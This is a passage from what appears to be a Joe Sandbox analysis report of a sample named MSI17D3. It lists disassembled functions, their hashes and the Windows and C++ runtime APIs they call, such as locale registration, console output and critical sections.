                                                                                                                                                                                • Opcode ID: 83adb260b7544a2f0c034ac35b02a9732cec86fb7e646741128b88c463085378
                                                                                                                                                                                • Instruction ID: 7914e6b05fcc3af7d53cec6ffb5ccfd002c82284de4efaa2e9bd5e64e39bd10b
                                                                                                                                                                                • Opcode Fuzzy Hash: 83adb260b7544a2f0c034ac35b02a9732cec86fb7e646741128b88c463085378
                                                                                                                                                                                • Instruction Fuzzy Hash: 34018071900219DBCB15EBA4D941BFE77A5AF85710F25050EF614AB392CF709E01EBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCEA09
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CCEA13
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CCEA64
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CCEA84
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 45d7f8a563a9a58444837f33fe59dd51fcfd75c7018e87e941e3a2f64939c244
                                                                                                                                                                                • Instruction ID: 62334fd055d142ace5ef857b030b82b7da7c6ef4463ae9a5f42ece2430bdae19
                                                                                                                                                                                • Opcode Fuzzy Hash: 45d7f8a563a9a58444837f33fe59dd51fcfd75c7018e87e941e3a2f64939c244
                                                                                                                                                                                • Instruction Fuzzy Hash: CE01D232900219DFCB15EBA4D841BBE7B65BF85720F25050EF510AB392CF709E01EBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCEBC8
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CCEBD2
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CCEC23
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CCEC43
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 51b21ece54dcff490e1599671a698982d811382b80fa5d09d753293f520a7d31
                                                                                                                                                                                • Instruction ID: e18892ff69b681dacd70acdbc95d53be47f537ca9f918a26758720715c084e3f
                                                                                                                                                                                • Opcode Fuzzy Hash: 51b21ece54dcff490e1599671a698982d811382b80fa5d09d753293f520a7d31
                                                                                                                                                                                • Instruction Fuzzy Hash: B301C031900219DBCB15EBA4D806BBE77B5AF80710F24044EE615AB3D2CF709E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2BBC
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2BC6
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2C17
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2C37
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: b1e15c87b5ae75f6a1de65780bc8f1bb38a96f63e0f00942c65a07365132437d
                                                                                                                                                                                • Instruction ID: 61850a0c1add902963e96312e0315b5f1a2de6f58cf1933f9632ae84893df69a
                                                                                                                                                                                • Opcode Fuzzy Hash: b1e15c87b5ae75f6a1de65780bc8f1bb38a96f63e0f00942c65a07365132437d
                                                                                                                                                                                • Instruction Fuzzy Hash: 6801C035900259DBCB19EBA4E801BBE77B5BF84310F24440EE510AB392CF749E00DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2CE6
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2CF0
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2D41
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2D61
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: fe68a8146132c594d2bf4718a257cf7ef1e5ea4daa82c38b07caeda3baac3778
                                                                                                                                                                                • Instruction ID: f716e0f0f1a009c587f8a407f1d46f1685129b5c31864927cf652f6f668dc248
                                                                                                                                                                                • Opcode Fuzzy Hash: fe68a8146132c594d2bf4718a257cf7ef1e5ea4daa82c38b07caeda3baac3778
                                                                                                                                                                                • Instruction Fuzzy Hash: 3E01C071900219DFCB19EBA0D841BBE7765BF94710F24050EE615AB392CF709E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2C51
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2C5B
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2CAC
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2CCC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: 085f40b022aadc5ca0d4b275d48fa592e4f35b285ee4751266479f65a734c965
                                                                                                                                                                                • Instruction ID: 54e03adc9611994838c51f9b131a9df10292bedf96d739acc7fe188ea7840b12
                                                                                                                                                                                • Opcode Fuzzy Hash: 085f40b022aadc5ca0d4b275d48fa592e4f35b285ee4751266479f65a734c965
                                                                                                                                                                                • Instruction Fuzzy Hash: B301CC75901219DBCB19EBA4D841BBE77A5AF80710F24040EF611AB392CF709E00EBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CCEC5D
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CCEC67
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CCECB8
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CCECD8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: e39197794eab7e44910e16a244630e71c80050f420ae6ad97cbe4ba09a435aba
                                                                                                                                                                                • Instruction ID: c3bcc9379acf529448c8969251c51c91f60db84a67d5a183a95fb28eaab1e539
                                                                                                                                                                                • Opcode Fuzzy Hash: e39197794eab7e44910e16a244630e71c80050f420ae6ad97cbe4ba09a435aba
                                                                                                                                                                                • Instruction Fuzzy Hash: 2201C071900219DBCB05EBA4D841BBE7B65BF80320F24040EF511AB392CF309E01DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2EA5
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2EAF
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2F00
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2F20
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: b06c9e1a301616ab8b6240828cad0708ca730096fe6436163ddbc23562ef8a43
                                                                                                                                                                                • Instruction ID: fba6ae3e3279939d2f1eed42feb48fa482c47933f06593b6f26ef13f9f6ce2d6
                                                                                                                                                                                • Opcode Fuzzy Hash: b06c9e1a301616ab8b6240828cad0708ca730096fe6436163ddbc23562ef8a43
                                                                                                                                                                                • Instruction Fuzzy Hash: 59018075900229DBCB05EBA4D841BBE7775BF84710F24050EF615AB392CF709E05DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2E10
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2E1A
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2E6B
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2E8B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: d924bd416603d2ec0a11961f34a494e2a59177dd47f89462cfa5458816114bfd
                                                                                                                                                                                • Instruction ID: 4230e213306856c900ce488fdffa03dbc5a077156d5249e633b869f96666d3b5
                                                                                                                                                                                • Opcode Fuzzy Hash: d924bd416603d2ec0a11961f34a494e2a59177dd47f89462cfa5458816114bfd
                                                                                                                                                                                • Instruction Fuzzy Hash: F001C476900219DBCB05EBA4D801BBE7765BF54711F24050EE51467391CF309E04DB91
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3.LIBCMT ref: 00CC2F3A
                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00CC2F44
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::_Lockit.LIBCPMT ref: 00CB8C50
                                                                                                                                                                                  • Part of subcall function 00CB8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00CB8C78
                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 00CC2F95
                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2FB5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2854358121-0
                                                                                                                                                                                • Opcode ID: a3eb350fbd62387b13383b8f7890a88d2ad366534b1405728d7c8d1b61b6af16
                                                                                                                                                                                • Instruction ID: d2085f7839d8807ef9b54cb7bca4bbe144eff1e86d67900b9eccb5901ea5f8d4
                                                                                                                                                                                • Opcode Fuzzy Hash: a3eb350fbd62387b13383b8f7890a88d2ad366534b1405728d7c8d1b61b6af16
                                                                                                                                                                                • Instruction Fuzzy Hash: 8C01C031900229DBCB15EBA0D801BBEB7B5BF84710F24050EF514AB392CF309E00DBA2
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,00CF3053,?,00000001,?,?,?,00CF2198,?,?,00000000), ref: 00CF369D
                                                                                                                                                                                • GetLastError.KERNEL32(?,00CF3053,?,00000001,?,?,?,00CF2198,?,?,00000000,?,?,?,00CF271F,?), ref: 00CF36A9
                                                                                                                                                                                  • Part of subcall function 00CF366F: CloseHandle.KERNEL32(FFFFFFFE,00CF36B9,?,00CF3053,?,00000001,?,?,?,00CF2198,?,?,00000000,?,?), ref: 00CF367F
                                                                                                                                                                                • ___initconout.LIBCMT ref: 00CF36B9
                                                                                                                                                                                  • Part of subcall function 00CF3631: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00CF3660,00CF3040,?,?,00CF2198,?,?,00000000,?), ref: 00CF3644
                                                                                                                                                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,00CF3053,?,00000001,?,?,?,00CF2198,?,?,00000000,?), ref: 00CF36CE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2744216297-0
                                                                                                                                                                                • Opcode ID: 87e57cb2ccc5a91df423d6c0f2ea7ad6e88241779faab243affaa50db15b4798
                                                                                                                                                                                • Instruction ID: de7ec427d35358740aa3246ead269b8be5058c38aa54ed23b2657d804d3344ba
                                                                                                                                                                                • Opcode Fuzzy Hash: 87e57cb2ccc5a91df423d6c0f2ea7ad6e88241779faab243affaa50db15b4798
                                                                                                                                                                                • Instruction Fuzzy Hash: 40F0C73650415CBBCF525F95DD05BAD3F66FF447A1B054150FF19D5230CA318920EB92
                                                                                                                                                                                APIs
                                                                                                                                                                                • SleepConditionVariableCS.KERNELBASE(?,00CD2CBD,00000064), ref: 00CD2D43
                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(00D0DD3C,?,?,00CD2CBD,00000064,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2D4D
                                                                                                                                                                                • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00CD2CBD,00000064,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2D5E
                                                                                                                                                                                • EnterCriticalSection.KERNEL32(00D0DD3C,?,00CD2CBD,00000064,?,?,?,00CB23B6,00D0E638,665E9022,?,?,00CF3D6D,000000FF), ref: 00CD2D65
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3269011525-0
                                                                                                                                                                                • Opcode ID: 64c942b2b7354194a43da9277bf64e22ef37da96e93a0d57dabf4abebd4a9c21
                                                                                                                                                                                • Instruction ID: ece742491264bf12e6684c40ac359565677ebbacf68a6069d237094165f28657
                                                                                                                                                                                • Opcode Fuzzy Hash: 64c942b2b7354194a43da9277bf64e22ef37da96e93a0d57dabf4abebd4a9c21
                                                                                                                                                                                • Instruction Fuzzy Hash: 39E01232545724BBDB126B94EC08BEE3F2BAF04B51B000152F60DA6271CA615951DBF6
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CBEC8E
                                                                                                                                                                                  • Part of subcall function 00CBD87C: __EH_prolog3.LIBCMT ref: 00CBD883
                                                                                                                                                                                  • Part of subcall function 00CBD87C: std::_Lockit::_Lockit.LIBCPMT ref: 00CBD88D
                                                                                                                                                                                  • Part of subcall function 00CBD87C: std::_Lockit::~_Lockit.LIBCPMT ref: 00CBD8FE
                                                                                                                                                                                • _Find_elem.LIBCPMT ref: 00CBEE8A
                                                                                                                                                                                Strings
                                                                                                                                                                                • 0123456789ABCDEFabcdef-+Xx, xrefs: 00CBECF6
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                • API String ID: 2544715827-2799312399
                                                                                                                                                                                • Opcode ID: bb5ccbcdff54d3032ae3f951833f129bf4ecb68cfa2cfed7b354bb773640ae35
                                                                                                                                                                                • Instruction ID: 719c534e39c04d6289e50a4a2b6d345217ffeb6cc111643483d51b46aa4d7080
                                                                                                                                                                                • Opcode Fuzzy Hash: bb5ccbcdff54d3032ae3f951833f129bf4ecb68cfa2cfed7b354bb773640ae35
                                                                                                                                                                                • Instruction Fuzzy Hash: 5BC19F34E042988FDF25DFA4C550BFCBBB2AF55700F2840A9E8956B283CB749E46DB51
                                                                                                                                                                                APIs
                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00CC62C8
                                                                                                                                                                                  • Part of subcall function 00CC2D74: __EH_prolog3.LIBCMT ref: 00CC2D7B
                                                                                                                                                                                  • Part of subcall function 00CC2D74: std::_Lockit::_Lockit.LIBCPMT ref: 00CC2D85
                                                                                                                                                                                  • Part of subcall function 00CC2D74: std::_Lockit::~_Lockit.LIBCPMT ref: 00CC2DF6
                                                                                                                                                                                • _Find_elem.LIBCPMT ref: 00CC6502
                                                                                                                                                                                Strings
                                                                                                                                                                                • 0123456789ABCDEFabcdef-+Xx, xrefs: 00CC633F
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000003.00000002.1686255065.0000000000CB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CB0000, based on PE: true
                                                                                                                                                                                • Associated: 00000003.00000002.1686237073.0000000000CB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686303322.0000000000CF7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686326220.0000000000D0C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                • Associated: 00000003.00000002.1686347690.0000000000D10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_3_2_cb0000_MSI17D3.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                • String ID: 0123456789ABCDEFabcdef-+Xx
                                                                                                                                                                                • API String ID: 2544715827-2799312399
                                                                                                                                                                                • Opcode ID: 4d1492e005596907e8dd7736e91ffee12a3172a903f1d1fecdd92909159b6b7e
                                                                                                                                                                                • Instruction ID: da02484bc4d34526f38c3e0d4587eae9d64095cb9d94564fd9007cf46a14d93e
                                                                                                                                                                                • Opcode Fuzzy Hash: 4d1492e005596907e8dd7736e91ffee12a3172a903f1d1fecdd92909159b6b7e
